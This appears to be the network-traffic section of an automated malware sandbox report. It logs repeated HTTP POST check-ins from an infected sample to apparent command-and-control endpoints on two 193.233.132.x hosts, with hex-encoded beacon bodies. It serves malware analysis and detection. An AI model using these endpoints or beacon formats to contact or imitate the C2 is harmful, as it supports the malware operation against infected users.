                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                              Source: global trafficHTTP traffic detected: POST /Pneh2sXQk0/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.56Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                              Source: global trafficHTTP traffic detected: POST /enigma/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 193.233.132.167Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
